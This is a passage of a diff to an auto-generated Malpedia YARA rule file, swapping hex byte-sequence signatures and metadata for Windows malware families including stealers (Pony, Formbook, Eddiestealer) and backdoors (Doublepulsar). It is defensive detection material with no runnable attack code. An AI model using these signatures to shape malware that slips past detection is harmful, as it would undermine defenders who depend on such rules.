+		$sequence_1 = { 8b0d???????? 6a04 6a08 51 ffd6 85c0 7491 }
+		$sequence_2 = { 52 56 884d0b e8???????? 8a450c 83c448 6a01 }
+		$sequence_3 = { 746a 53 ff15???????? 8b4df4 51 c645ff01 ffd7 }
+		$sequence_4 = { 8d4da0 51 52 50 ff55c8 85c0 }
+		$sequence_5 = { c645bc0d 668955bd 894dbf 8bde 7409 83c302 66833b2a }
+		$sequence_6 = { 7449 899e8caf0600 3d06010000 7305 e8???????? 899e7caf0600 0fb60f }
+		$sequence_7 = { 52 ffd7 8bd8 895c2414 85db }
+		$sequence_8 = { 895de8 3bde 0f8418010000 8b55ec 8b45f8 53 52 }
+		$sequence_9 = { 8d4602 50 8d8f22020000 51 ff15???????? 33d2 668916 }
 
 	condition:
-		7 of them and filesize < 3915776
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Unidentified_075_Auto : FILE
+rule MALPEDIA_Win_Redshawl_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "147c0d53-aecb-5cae-ac7f-14d52d3c203f"
-		date = "2023-07-11"
-		modified = "2023-07-15"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_075_auto.yar#L1-L115"
+		id = "f52543ad-f3b0-5635-b08b-6e314d7ab25e"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.redshawl_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "10617fdfd534147bc5e0f7e922724e69d45c37af66d21f98c629fa1bac685120"
+		logic_hash = "9697ea4899eafca20347b787cabf2930212702df9b80046d2c793afaab560dfd"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20230705"
-		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
-		malpedia_version = "20230715"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c40c 6808020000 8d95dcf6ffff 52 6a00 }
-		$sequence_1 = { 8bc1 5e 5d c3 55 8bec ff15???????? }
-		$sequence_2 = { 52 e8???????? 6a00 8d85ace6ffff 50 8d8dbceeffff 51 }
-		$sequence_3 = { 83c40c 33c0 668985d4f4ffff 6806020000 }
-		$sequence_4 = { 837d9400 740d 8b55fc c7821002000000000000 837df000 }
-		$sequence_5 = { 52 ff15???????? 83c410 b853000000 66898550ffffff }
-		$sequence_6 = { 33c0 668945d0 8d4dd4 51 }
-		$sequence_7 = { 742c 8b4514 85c0 7421 }
-		$sequence_8 = { 85c0 0f8431ffffff b901000000 85c9 0f8515ffffff }
-		$sequence_9 = { 81eca4000000 894dfc c745f400000000 c745f800000000 }
+		$sequence_0 = { 4889442438 895c2430 4489642428 4c89642420 4533c9 4c8bc6 488d942430010000 }
+		$sequence_1 = { 488b4c2448 e8???????? 90 90 e9???????? 488d542450 418bcc }
+		$sequence_2 = { 7329 4863d1 488d0d90770000 488bc2 }
+		$sequence_3 = { 488d8c2431010000 e8???????? ba04010000 488d8c2440020000 ff15???????? 4c8bde 488d8c2430010000 }
+		$sequence_4 = { 3b3d???????? 737d 488bdf 488bf7 48c1fe05 4c8d25ea7e0000 }
+		$sequence_5 = { 4c8be9 488b05???????? 4885c0 0f8436010000 48833d????????00 }
+		$sequence_6 = { 48895c2408 57 4883ec20 488d1d0b6d0000 488d3d046d0000 }
+		$sequence_7 = { 7532 488d0d239d0000 e8???????? ff15???????? 89442460 488d150c000000 }
+		$sequence_8 = { 8364242800 41b803000000 488d0d6c320000 4533c9 ba00000040 4489442420 }
+		$sequence_9 = { 418bcc e8???????? 8bd8 89442440 85c0 }
 
 	condition:
-		7 of them and filesize < 393216
+		7 of them and filesize < 174080
 }
-rule MALPEDIA_Win_Formbook_Auto : FILE
+rule MALPEDIA_Win_Allaple_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8c050ce6-9039-5f0c-9eda-53d46123b24c"
+		id = "76748fdd-5448-52e3-b40a-c8804bcac97d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.formbook_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.allaple_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "986f42b5e94183a87a4b3ecc04f39bd7a6cdd90998ce87e5be2a2b4f7bf3d394"
+		logic_hash = "89aee7277247b951ca979dcece1297fc5fda6e02a408403041aa3b0414e347cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137868,32 +137526,32 @@ rule MALPEDIA_Win_Formbook_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8be5 5d c3 8d48f8 80f903 771e 8b5518 }
-		$sequence_1 = { 8bec 8b4508 8b4810 56 6a0d 6a00 }
-		$sequence_2 = { 56 e8???????? 56 e8???????? 40 50 8b450c }
-		$sequence_3 = { e8???????? 83c418 8986dc020000 85c0 780c 8b4d0c }
-		$sequence_4 = { 85ff 7439 8b550c 85d2 7432 8b4d10 33c0 }
-		$sequence_5 = { 33c0 85d2 741b 8d0c79 53 8d642400 668b1c46 }
-		$sequence_6 = { 80fa03 0f862cffffff 3c34 0f8446ffffff 3c35 0f8460ffffff 8d48c8 }
-		$sequence_7 = { e8???????? 8b4508 8d4df8 51 8d55f0 52 6a00 }
-		$sequence_8 = { 53 56 57 8b7d10 8d8768480000 50 8db768080000 }
-		$sequence_9 = { 51 57 e8???????? 83c410 85c0 7915 8b13 }
+		$sequence_0 = { 8945f4 57 ff75fc e8???????? 8945f0 897de8 897dec }
+		$sequence_1 = { 83c704 c70704000000 83c704 6a18 ff7510 57 e8???????? }
+		$sequence_2 = { c7420c76543210 8be5 5d c3 55 8bec }
+		$sequence_3 = { 0345d8 50 e8???????? 83c408 a3???????? 6a03 ff35???????? }
+		$sequence_4 = { 8b45e4 33c2 8945e4 8b4dec 8b55f0 8d044a 0345b0 }
+		$sequence_5 = { 52 ff750c e8???????? 47 4b 83c604 0bdb }
+		$sequence_6 = { 50 ff75fc e8???????? 8d85c0feffff 50 8d85c4feffff }
+		$sequence_7 = { 6a00 6a64 8d8544fdffff 50 e8???????? 6a00 }
+		$sequence_8 = { 8b55fc 8b4238 3345f4 8b4df8 894138 8b55fc 8b423c }
+		$sequence_9 = { 8975f0 6a50 e8???????? 668945ee 6a10 8d45ec 50 }
 
 	condition:
-		7 of them and filesize < 371712
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Transferloader_Auto : FILE
+rule MALPEDIA_Win_Gearshift_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6881fadd-235e-58e1-86ed-39c1ca8da641"
+		id = "5cb12abd-628a-5169-a5df-e2c33952153a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.transferloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.transferloader_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearshift"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gearshift_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "c6b3fd0089b61d2c316b9ea19bd98256a6361edd3a6f033006f4e490787182fc"
+		logic_hash = "e8d3111d44f6324e90544c2ebdde13a938df2e4a9f50331b57f760f4ee12b3d4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137907,32 +137565,32 @@ rule MALPEDIA_Win_Transferloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb609 880c02 e9???????? 48837c244800 7412 4c8b442448 33d2 }
-		$sequence_1 = { 4889442438 41b810000000 488b542438 488b4c2430 }
-		$sequence_2 = { 88440c20 b801000000 486bc002 b901000000 486bc901 }
-		$sequence_3 = { 488d442424 48898424f8000000 488d442420 4889842400010000 }
-		$sequence_4 = { b903000000 f3aa 48b8bce015361abafbff 48898424c8000000 c744242c00000000 486344242c }
-		$sequence_5 = { 4889842498010000 488b842490010000 4889842468010000 c6442440eb c644244108 c644244248 c644244389 }
-		$sequence_6 = { 488b09 4863493c 480308 488bc1 4889442430 488b442430 }
-		$sequence_7 = { 4889542410 48894c2408 4881eca8000000 c6442420eb c644242108 }
-		$sequence_8 = { 488b442420 4889442428 488b442428 0fb700 3d4d5a0000 7404 32c0 }
-		$sequence_9 = { 488b8c2420010000 ff15???????? 4883bc24e000000000 7418 4c8b8424e0000000 33d2 }
+		$sequence_0 = { 4883ec20 85c9 7871 3b0d???????? 7369 4863d9 488d2dff1a0300 }
+		$sequence_1 = { 48895c2408 4889742410 48897c2418 498bf8 8bda 488bf1 443bca }
+		$sequence_2 = { e8???????? e9???????? 488b442450 488d0db7350300 488b04c1 41f644070840 }
+		$sequence_3 = { 4883c310 48ffce 75d4 488d1def070300 }
+		$sequence_4 = { 8b4ffc 41b940000000 41b800100000 488bd0 4903ce 488bd8 }
+		$sequence_5 = { 488b4c2430 4885c9 7406 ff15???????? 8bc7 eb02 }
+		$sequence_6 = { e8???????? 33c9 3d00040000 7510 e8???????? b801000000 4883c430 }
+		$sequence_7 = { 4883c328 0fb74806 443bf9 0f8c50ffffff 488b4500 8b4828 }
+		$sequence_8 = { 0f84ca020000 488d05d13b0300 4a8b04e0 41f644070880 0f84b3020000 e8???????? 33db }
+		$sequence_9 = { 488d542434 8bc8 ff15???????? 33c0 488d542438 }
 
 	condition:
-		7 of them and filesize < 216064
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Pony_Auto : FILE
+rule MALPEDIA_Win_Voldemort_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1e9f1216-c41a-57fb-9136-54f943e63660"
+		id = "7d125483-3b6e-5a9c-99c0-128adae803f8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pony_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.voldemort"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.voldemort_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "9de93368584eaaab5c5e69d58fb6c6411ee417490cc0e48dc0aded17e02bd8ef"
+		logic_hash = "6016b2bc3970bf978eb2d9654ea41d202d59cf54c1ab79dd97509026eb74172c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137946,32 +137604,32 @@ rule MALPEDIA_Win_Pony_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c6400200 c6400300 c6400400 c6400505 8d45f4 50 }
-		$sequence_1 = { 33f9 8d9c1f051d8804 035e18 c1c317 }
-		$sequence_2 = { 7406 50 e8???????? c785dcf7ffff15000000 8d85d0f7ffff }
-		$sequence_3 = { ff750c ff35???????? e8???????? 8945f4 6a00 ff7514 ff750c }
-		$sequence_4 = { c1e002 31c2 89c8 c1e810 31d0 89c3 }
-		$sequence_5 = { 75ed 0fb646ff 83f808 7702 2bf0 2b7510 d1ee }
-		$sequence_6 = { 2bfb 83fb38 720e 03fb b840000000 2bc3 03f8 }
-		$sequence_7 = { 6800fa0000 ff75f4 ff7508 e8???????? 85c0 0f8430010000 ff75f4 }
-		$sequence_8 = { 68???????? e8???????? 898554ffffff 83bd54ffffff00 7445 83bd58ffffff14 723c }
-		$sequence_9 = { ff7518 e8???????? ff750c e8???????? d1e0 83c002 }
+		$sequence_0 = { 4803c1 48894308 e9???????? 48895c2408 }
+		$sequence_1 = { 48894308 e9???????? 48895c2408 57 }
+		$sequence_2 = { 418ac0 c3 488bc4 48895808 48896810 48897018 48897820 }
+		$sequence_3 = { 0f45c7 4803c1 48894308 e9???????? 48895c2408 57 4883ec20 }
+		$sequence_4 = { 488b5c2408 418ac0 c3 488bc4 }
+		$sequence_5 = { 7597 41b001 488b5c2408 418ac0 c3 488bc4 }
+		$sequence_6 = { 488b5c2408 418ac0 c3 488bc4 48895808 48896810 48897018 }
+		$sequence_7 = { 8d78fe 0f45c7 4803c1 48894308 e9???????? 48895c2408 }
+		$sequence_8 = { 488b5c2408 418ac0 c3 488bc4 48895808 48896810 }
+		$sequence_9 = { 5f c3 4c8bdc 49895b18 57 4883ec40 }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 577536
 }
-rule MALPEDIA_Win_Snake_Disk_Auto : FILE
+rule MALPEDIA_Win_Kwampirs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "86a91047-7721-509e-9428-5943ccd33d29"
+		id = "a88d76d0-b266-5ba2-9e4c-b6324e74f1af"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snake_disk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.snake_disk_auto.yar#L1-L93"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kwampirs_auto.yar#L1-L112"
 		license_url = "N/A"
-		logic_hash = "e3a90a61952999ecca57fcbf79005364fd6ba06d48c543b4f3fe48fb8c119e3f"
+		logic_hash = "47dcb9c842442be04bc0bae4d6dd96d075eca81ceae0f2c5424da9336b167768"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -137985,30 +137643,32 @@ rule MALPEDIA_Win_Snake_Disk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 898558ffffff 85c0 0f84a30b0000 }
-		$sequence_1 = { e8???????? 898548ffffff 8b08 8b8184010000 8d4db4 898544ffffff 397dac }
-		$sequence_2 = { e8???????? 898550ffffff 897dbc 3bf8 }
-		$sequence_3 = { e8???????? 89855cffffff ff7720 e8???????? }
-		$sequence_4 = { e8???????? 898560ffffff 85c0 0f8410070000 }
-		$sequence_5 = { e8???????? 898550ffffff 59 59 }
-		$sequence_6 = { e8???????? 89855cffffff 85c0 7874 }
-		$sequence_7 = { e8???????? 898550ffffff 85c0 0f84a4000000 }
+		$sequence_0 = { 391f 0f95c0 8b4df0 64890d00000000 59 5f 5e }
+		$sequence_1 = { 83c418 85c0 7512 8b07 50 e8???????? 83c404 }
+		$sequence_2 = { 391f 0f95c0 8b4df0 64890d00000000 }
+		$sequence_3 = { 52 50 8d8dbcf3ffff 51 }
+		$sequence_4 = { 33d2 668955f6 e8???????? 83c40c }
+		$sequence_5 = { ffd6 8b45c0 50 ffd6 }
+		$sequence_6 = { 50 ffd6 8b4dc4 51 ffd6 }
+		$sequence_7 = { 668955f6 e8???????? 83c40c 33d2 }
+		$sequence_8 = { c745fcfeffffff e8???????? b001 8b4df0 }
+		$sequence_9 = { 33d2 6816060000 52 8d85bef3ffff 50 }
 
 	condition:
-		7 of them and filesize < 28734464
+		7 of them and filesize < 2695168
 }
-rule MALPEDIA_Win_Laturo_Auto : FILE
+rule MALPEDIA_Win_Chinoxy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f1cda2c1-6a5a-560d-b916-62a96cbfcef4"
+		id = "78736f40-563d-5718-b05e-03a3a946c1f4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.laturo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.laturo_auto.yar#L1-L175"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinoxy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chinoxy_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "fadff8d37ea5314574a4da4608d7ce7e1536afc4770400da40abe05fbc19031e"
+		logic_hash = "c0bd3bd9ac342844eead2562e34424d0e649b578cd28d421251d6ac44bae37dc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138022,38 +137682,32 @@ rule MALPEDIA_Win_Laturo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 418bf0 4c8d0d83b80000 8bda 4c8d0572b80000 488bf9 488d1570b80000 }
-		$sequence_1 = { 88442438 807c243801 7413 807c243802 743a }
-		$sequence_2 = { 57 4883ec78 c744242000000000 e8???????? 48833d????????00 0f84fb010000 488b8c2490000000 }
-		$sequence_3 = { 4889442410 837c244c40 750d 0fb60424 88442403 }
-		$sequence_4 = { 3b442450 740a 8b442420 89442424 }
-		$sequence_5 = { 4883ec38 488b442440 48833800 747b c744242000000000 eb0a }
-		$sequence_6 = { 25f0000000 3d80000000 0f8521010000 0fb6442450 488b4c2430 4803c8 488bc1 }
-		$sequence_7 = { 4488742470 eb22 488d3d720a0100 eb19 488d3d610a0100 eb10 }
-		$sequence_8 = { eb3f f6c201 740d 8b0e 8d41fb 3985e0fdffff 7430 }
-		$sequence_9 = { 2502ffffff eb0d 8b45f4 807dfa05 0fb6c0 }
-		$sequence_10 = { 8a4dff d3e0 84c0 7907 }
-		$sequence_11 = { c745d500000000 66c745c40f80 c745c600000000 c645ff00 897de4 }
-		$sequence_12 = { c645f404 eb2b c645f401 eb25 f6c110 7410 }
-		$sequence_13 = { 51 0f95c0 6a40 8d044505000000 50 53 }
-		$sequence_14 = { 43 884210 2a5dd8 881a 80fb0f 7615 814a1800500000 }
-		$sequence_15 = { 68???????? 897df8 ff15???????? 85c0 742a 8b3d???????? 83fe20 }
+		$sequence_0 = { 7405 394004 7538 6a3c e8???????? 83c404 89442408 }
+		$sequence_1 = { 897e5c 897e60 897e64 897e68 897e6c 897e70 897c2414 }
+		$sequence_2 = { 52 e8???????? 83c408 85c0 0f84a7000000 8b4f08 6a00 }
+		$sequence_3 = { 8b5918 33eb 33db 33c5 89442414 8be8 8a5c2416 }
+		$sequence_4 = { 743a 8b431c 8db140800200 85c0 7506 8db15c800200 8bce }
+		$sequence_5 = { 3bc6 8b5008 895610 75a7 e9???????? 8b85a0020000 }
+		$sequence_6 = { 8bde c1ef10 c1e310 0bfb 2bc6 33f8 03f1 }
+		$sequence_7 = { b9???????? e8???????? 85ff 740a 83c704 57 ff15???????? }
+		$sequence_8 = { 8bf9 c1ee18 c1e708 0bf7 2bd9 33f3 }
+		$sequence_9 = { 83f8ff 7409 83c004 3bc6 7602 8bf8 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 1138688
 }
-rule MALPEDIA_Win_Makop_Auto : FILE
+rule MALPEDIA_Win_Doublepulsar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e214999d-16a1-514d-bedc-c66a8b25498d"
+		id = "e360b7f1-7141-5d69-b347-a9d866ef6b2b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.makop_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.doublepulsar_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "fab88e1b8315d53c8f1d019ae0fd200eb0984fdd471585289f6762a4445cd571"
+		logic_hash = "459595fa25b87fbf8bb9d6bb59b89562d36c28a4b010623ea717539c5888323b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138067,32 +137721,32 @@ rule MALPEDIA_Win_Makop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5e 5b 83c41c c3 ffd7 50 e8???????? }
-		$sequence_1 = { 8bc6 e8???????? 894630 8b4500 8903 8b0f }
-		$sequence_2 = { 894118 8b0e c6412800 e8???????? }
-		$sequence_3 = { ff15???????? 8bf0 83feff 744f 8bc7 8a08 83c001 }
-		$sequence_4 = { 8d04b8 7414 8b00 50 6a00 ffd5 50 }
-		$sequence_5 = { 833e00 8b35???????? c744240c00000000 7645 8b5c2410 8da42400000000 8b0b }
-		$sequence_6 = { 53 a3???????? ff15???????? 50 ff15???????? 8d742418 e8???????? }
-		$sequence_7 = { 56 e8???????? 8d4e28 51 6a0a 8bc6 e8???????? }
-		$sequence_8 = { c3 ffd7 50 e8???????? 83c404 5f 5e }
-		$sequence_9 = { 6a00 8d4c2414 51 52 57 55 c744242800000000 }
+		$sequence_0 = { 668b00 c3 81e2ffff0000 c1e202 01d1 8b09 01c8 }
+		$sequence_1 = { 6852445000 ff75fc 6a01 ff13 }
+		$sequence_2 = { 894530 8b4620 8b7d65 83c703 8907 8b4628 a902000000 }
+		$sequence_3 = { ff500c 85c0 748c 33c0 5f 5e 5b }
+		$sequence_4 = { 8b8c003cb54000 03c0 894e5c 8b9040b54000 895660 8b8844b54000 894e64 }
+		$sequence_5 = { 85c0 7463 8b442444 6a0e 53 50 }
+		$sequence_6 = { 88c8 c1e908 00c8 c1e908 00c8 c1e908 00c8 }
+		$sequence_7 = { 03d8 2be8 85ed 75ac }
+		$sequence_8 = { e8???????? a1???????? 33c4 898424a0100000 55 56 8bb424b0100000 }
+		$sequence_9 = { 0f85f4000000 41 83f813 0f8287010000 8b4a0b 41 8bc0 }
 
 	condition:
-		7 of them and filesize < 107520
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Ismagent_Auto : FILE
+rule MALPEDIA_Win_Rekoobew_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "67740cfb-8507-5206-9327-8d9ca8f2fd2f"
+		id = "c4672783-76e3-563a-8027-eca1db960fbe"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ismagent_auto.yar#L1-L100"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rekoobew"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rekoobew_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "59fcd27aca5a3625483340bfe48980fca66506765ca3b82f7d01afb486f805fc"
+		logic_hash = "58559e9eb7cf00c4472271b9f2f8096ac74daa9182ac5f503ca473672c8d4ebd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138106,30 +137760,32 @@ rule MALPEDIA_Win_Ismagent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68000000a0 ff7510 51 57 ffd0 68???????? }
-		$sequence_1 = { 50 56 57 8d942418170000 }
-		$sequence_2 = { 68e8030000 50 8d8424580b0000 50 e8???????? 83c40c 8d842418030000 }
-		$sequence_3 = { f3a4 8dbc24183e0000 4f 90 }
-		$sequence_4 = { 33c9 660f1f840000000000 8a81a00a4200 8d4901 88840c370f0000 84c0 }
-		$sequence_5 = { 66a5 8b7c2418 837c241400 742d 8bc8 8d5101 }
-		$sequence_6 = { c744243400000000 e8???????? 8b4c2428 8d442444 }
-		$sequence_7 = { 51 8b4c2434 8d942418070000 50 6a01 }
+		$sequence_0 = { 8b75bc 3375c4 3375d8 3375ec }
+		$sequence_1 = { 0fb6fe 89ca 3314bde08c4000 0fb6f2 8b3cb5e0904000 }
+		$sequence_2 = { 894714 83c201 83fa08 7588 }
+		$sequence_3 = { 33348de0704000 8b4de8 c1e910 0fb6c9 33348de0744000 8975e0 }
+		$sequence_4 = { 3c0d 745e 80f93d 0f85a0feffff 89f0 eb53 b8ffffffff }
+		$sequence_5 = { 894de0 0fb67004 c1e618 0fb65005 c1e210 09f2 0fb67007 }
+		$sequence_6 = { 0f84c5000000 8b5078 85d2 0f84ba000000 8b35???????? 85f6 }
+		$sequence_7 = { 33735c 89d7 c1ef18 3334bde0844000 89cf c1ef10 81e7ff000000 }
+		$sequence_8 = { 09d7 0fb64827 09cf 0fb65026 c1e208 09d7 897dc8 }
+		$sequence_9 = { e8???????? 85c0 7916 c704240f000000 e8???????? b828000000 e9???????? }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 248832
 }
-rule MALPEDIA_Win_Ratankbapos_Auto : FILE
+rule MALPEDIA_Win_Eddiestealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c30c3afc-d593-5fd1-9897-681a89fdb715"
+		id = "e232a61b-2f1e-5ab2-a023-babaefc44f11"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankbapos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ratankbapos_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eddiestealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.eddiestealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "9d94248f5eeb0fe7fd704ad2035548b948a3d89033ce9c65e0f71221072d6968"
+		logic_hash = "755d9f27c3527a6497613857d1940285eade46fbad0b63ce47e48a5daf512e5a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138143,32 +137799,32 @@ rule MALPEDIA_Win_Ratankbapos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c5 8945f8 56 8b7508 85f6 0f8413010000 }
-		$sequence_1 = { ff15???????? 8bf0 8d4dcc 897304 }
-		$sequence_2 = { 0fbec2 0fbe8040010110 83e00f eb02 33c0 0fbe84c160010110 }
-		$sequence_3 = { c1f905 8b0c8de04d0110 83e01f c1e006 f644080401 }
-		$sequence_4 = { eb05 1bc0 83d8ff 85c0 7508 8d8646b10000 }
-		$sequence_5 = { 83e203 83f908 7229 f3a5 ff249590490010 }
-		$sequence_6 = { 40 3acb 75f9 2bc6 3bd0 72dc }
-		$sequence_7 = { 8b5518 50 8b4514 51 8b4d08 52 50 }
-		$sequence_8 = { e8???????? 8b4da4 8945c8 c6040800 }
-		$sequence_9 = { 0fbe8040010110 83e00f eb02 33c0 0fbe84c160010110 6a07 c1f804 }
+		$sequence_0 = { 4c3ba42498000000 0f84da010000 498d7c2410 49897f40 488b842488000000 4c8b28 488b842490000000 }
+		$sequence_1 = { b808000000 488d0d6faf0500 48894d00 48895d08 48894510 0f117518 488dbc24500c0000 }
+		$sequence_2 = { 4d39d3 4c89d1 490f47cb 4584ff 490f45cb 4c0f45d7 4c8b5c2440 }
+		$sequence_3 = { 8b542430 e8???????? 0fb66802 440fb738 4181f7aafa0000 4080f544 b903000000 }
+		$sequence_4 = { e8???????? 660fefc0 488365f000 660f7f45d0 660f7f45e0 31c9 488d1578820600 }
+		$sequence_5 = { 7720 4c8b0411 4c330408 4c89440c30 4883c108 ebe7 488bb42400010000 }
+		$sequence_6 = { e8???????? 668932 4889842488000000 4889942490000000 48c784249800000002000000 c68424a000000005 0f108424b0020000 }
+		$sequence_7 = { e8???????? e8???????? 488b4808 48898c2448010000 488b4010 4889842438010000 488d055e330300 }
+		$sequence_8 = { c1e80c 31d0 89c2 c1ea10 31c2 69c2fad30000 0fb7c0 }
+		$sequence_9 = { 31d2 488d0d72810400 49b8001927cf2367fead 41f6c101 741c 440fb60c0a 4d09c1 }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 1316864
 }
-rule MALPEDIA_Win_Mail_O_Auto : FILE
